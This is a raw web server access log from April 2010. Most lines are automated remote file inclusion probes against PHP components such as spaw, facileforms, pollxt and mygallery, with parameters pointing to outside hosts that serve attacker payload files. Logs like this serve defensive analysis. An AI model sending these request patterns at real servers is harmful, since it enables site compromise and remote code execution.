222.122.197.37 - - [07/Apr/2010:01:56:40 -0500] "GET /logs/access_log.1218067200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.122.197.37 - - [07/Apr/2010:01:57:09 -0500] "GET /logs/access_log.1218067200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
174.37.98.219 - - [07/Apr/2010:01:57:11 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 811 "-""Mozilla/5.0"
174.37.98.219 - - [07/Apr/2010:01:57:11 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
174.37.98.219 - - [07/Apr/2010:01:57:11 -0500] "GET /logs/access_log.1268265600%20%20///?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.46.199.41 - - [07/Apr/2010:01:57:39 -0500] "GET /logs/access_log.1255564800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [07/Apr/2010:02:04:07 -0500] "GET /logs/access_log.1265155200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.100.254.159 - - [07/Apr/2010:02:07:24 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.86.93.194 - - [07/Apr/2010:02:07:32 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.184.4.157 - - [07/Apr/2010:02:07:52 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.184.4.157 - - [07/Apr/2010:02:07:52 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
70.98.34.37 - - [07/Apr/2010:02:08:18 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
195.88.6.17 - - [07/Apr/2010:02:08:19 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
174.37.98.219 - - [07/Apr/2010:02:09:58 -0500] "GET /logs/access_log.1268265600///?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.100.254.159 - - [07/Apr/2010:02:12:29 -0500] "GET /logs/access_log.1219708800//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
212.100.254.159 - - [07/Apr/2010:02:12:29 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.100.254.159 - - [07/Apr/2010:02:12:30 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
207.46.195.239 - - [07/Apr/2010:02:15:07 -0500] "GET /artwork/trunks.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.176.241.117 - - [07/Apr/2010:02:17:42 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://seltsames.x10hosting.com/admin/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
206.176.241.117 - - [07/Apr/2010:02:17:42 -0500] "GET /logs/access_log.1227398400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://seltsames.x10hosting.com/admin/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
206.176.241.117 - - [07/Apr/2010:02:17:42 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://seltsames.x10hosting.com/admin/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
94.247.178.106 - - [07/Apr/2010:02:18:41 -0500] "GET /logs/access_log.1268265600///?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
189.78.125.169 - - [07/Apr/2010:02:20:35 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.227.141.53 - - [07/Apr/2010:02:23:36 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:23:36 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:23:36 -0500] "GET /logs/access_log.1235779200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:23:37 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:23:37 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:23:37 -0500] "GET /logs/access_log.1235779200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:24:26 -0500] "GET /logs/access_log.1260835200//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 359 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:24:26 -0500] "GET /logs/access_log.1258329600//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 359 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:24:26 -0500] "GET /logs//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:24:26 -0500] "GET //script_path/cms/classes/openengine/filepool.php?oe_classpath=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.115.111.248 - - [07/Apr/2010:02:24:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
212.227.141.53 - - [07/Apr/2010:02:25:52 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:25:52 -0500] "GET /logs/access_log.1235779200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:25:52 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:25:57 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:25:57 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:25:57 -0500] "GET /logs/access_log.1235779200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
212.100.254.159 - - [07/Apr/2010:02:26:30 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.86.93.194 - - [07/Apr/2010:02:26:53 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.184.4.157 - - [07/Apr/2010:02:27:17 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.184.4.157 - - [07/Apr/2010:02:27:17 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
70.98.34.37 - - [07/Apr/2010:02:28:17 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
195.88.6.17 - - [07/Apr/2010:02:28:34 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
212.227.141.53 - - [07/Apr/2010:02:30:21 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:30:21 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:30:22 -0500] "GET /logs/access_log.1235779200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:31:04 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:31:04 -0500] "GET /logs/access_log.1235779200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:02:31:04 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.13.90 - - [07/Apr/2010:02:33:08 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [07/Apr/2010:02:34:11 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
206.176.241.117 - - [07/Apr/2010:02:41:49 -0500] "GET /logs/access_log.1227398400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://seltsames.x10hosting.com/admin/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
206.176.241.117 - - [07/Apr/2010:02:41:49 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://seltsames.x10hosting.com/admin/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
206.176.241.117 - - [07/Apr/2010:02:41:49 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://seltsames.x10hosting.com/admin/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:45:09 -0500] "GET /logs/access_log.1243987200//index.php?link=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:45:09 -0500] "GET /logs//index.php?link=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:45:09 -0500] "GET /logs/access_log.1252368000//index.php?link=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:02:45:09 -0500] "GET //index.php?link=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.19.4.18 - - [07/Apr/2010:02:52:37 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.250.255.243 - - [07/Apr/2010:02:53:01 -0500] "GET /artwork/txt.htm HTTP/1.1" 200 3880 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [07/Apr/2010:02:57:28 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.55.218.158 - - [07/Apr/2010:03:01:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [07/Apr/2010:03:04:20 -0500] "GET //modules/xfsection/modify.php?dir_module=http://l33ft.altervista.org/FxID1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:04:20 -0500] "GET /logs/access_log.1218067200%20%20//modules/xfsection/modify.php?dir_module=http://l33ft.altervista.org/FxID1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:04:20 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://l33ft.altervista.org/FxID1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.115.111.248 - - [07/Apr/2010:03:05:04 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [07/Apr/2010:03:05:07 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
217.70.32.2 - - [07/Apr/2010:03:05:13 -0500] "GET /logs/access_log.1218067200//modules/xfsection/modify.php?dir_module=http://l33ft.altervista.org/FxID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:05:13 -0500] "GET //modules/xfsection/modify.php?dir_module=http://l33ft.altervista.org/FxID1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:05:13 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://l33ft.altervista.org/FxID1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:18 -0500] "GET /logs/access_log.1220054400//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:18 -0500] "GET //include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:18 -0500] "GET /logs//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:27 -0500] "GET //include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:27 -0500] "GET /logs//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:27 -0500] "GET /logs/access_log.1220054400//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:33 -0500] "GET //include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:33 -0500] "GET /logs//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:05:33 -0500] "GET /logs/access_log.1220054400%20%20//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:06:35 -0500] "GET //include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:06:35 -0500] "GET /logs//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:03:06:35 -0500] "GET /logs/access_log.1220054400%20%20//include/write.php?dir=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.124.212.196 - - [07/Apr/2010:03:10:13 -0500] "GET /logs/access_log.1247875200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1247875200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
98.254.47.5 - - [07/Apr/2010:03:10:37 -0500] "GET http://tomdolan.pconline.com/logs/access_log.1247875200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1247875200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
98.254.47.5 - - [07/Apr/2010:03:10:39 -0500] "GET http://tomdolan.pconline.com/logs/access_log.1247875200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1247875200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
222.124.212.196 - - [07/Apr/2010:03:11:16 -0500] "GET /logs/access_log.1247875200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1247875200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
222.124.212.196 - - [07/Apr/2010:03:11:33 -0500] "GET /logs/access_log.1247875200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1247875200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
79.98.23.9 - - [07/Apr/2010:03:12:00 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:00 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:00 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:00 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.124.212.196 - - [07/Apr/2010:03:12:20 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
79.98.23.9 - - [07/Apr/2010:03:12:20 -0500] "GET /logs/access_log.1219449600%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:20 -0500] "GET /logs/access_log.1219449600%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:30 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:30 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:31 -0500] "GET /logs/access_log.1219449600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:42 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:42 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:12:43 -0500] "GET /logs/access_log.1219449600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:13:56 -0500] "GET /logs/access_log.1219708800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:13:56 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:13:56 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:14:19 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:14:19 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:14:19 -0500] "GET /logs/access_log.1219708800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.100.254.159 - - [07/Apr/2010:03:14:43 -0500] "GET /logs/access_log.1220054400//core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
212.100.254.159 - - [07/Apr/2010:03:14:43 -0500] "GET //core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
212.100.254.159 - - [07/Apr/2010:03:14:43 -0500] "GET /logs//core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.46.199.196 - - [07/Apr/2010:03:19:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.78.125.169 - - [07/Apr/2010:03:20:22 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
216.121.63.153 - - [07/Apr/2010:03:21:07 -0500] "GET /index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:07 -0500] "GET /logs/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:07 -0500] "GET /logs/access_log.1258070400/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:09 -0500] "GET /logs/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:09 -0500] "GET /logs/access_log.1258070400/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:09 -0500] "GET /index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:18 -0500] "GET /index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:18 -0500] "GET /logs/access_log.1258070400/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:18 -0500] "GET /logs/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:23 -0500] "GET /logs/access_log.1260835200/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:24 -0500] "GET /logs/access_log.1260835200/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:21:30 -0500] "GET /logs/access_log.1260835200/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:21:52 -0500] "GET //poc.php?sourcedir=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:21:52 -0500] "GET /logs//poc.php?sourcedir=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:21:52 -0500] "GET /logs/access_log.1261353600//poc.php?sourcedir=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:30 -0500] "GET /index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
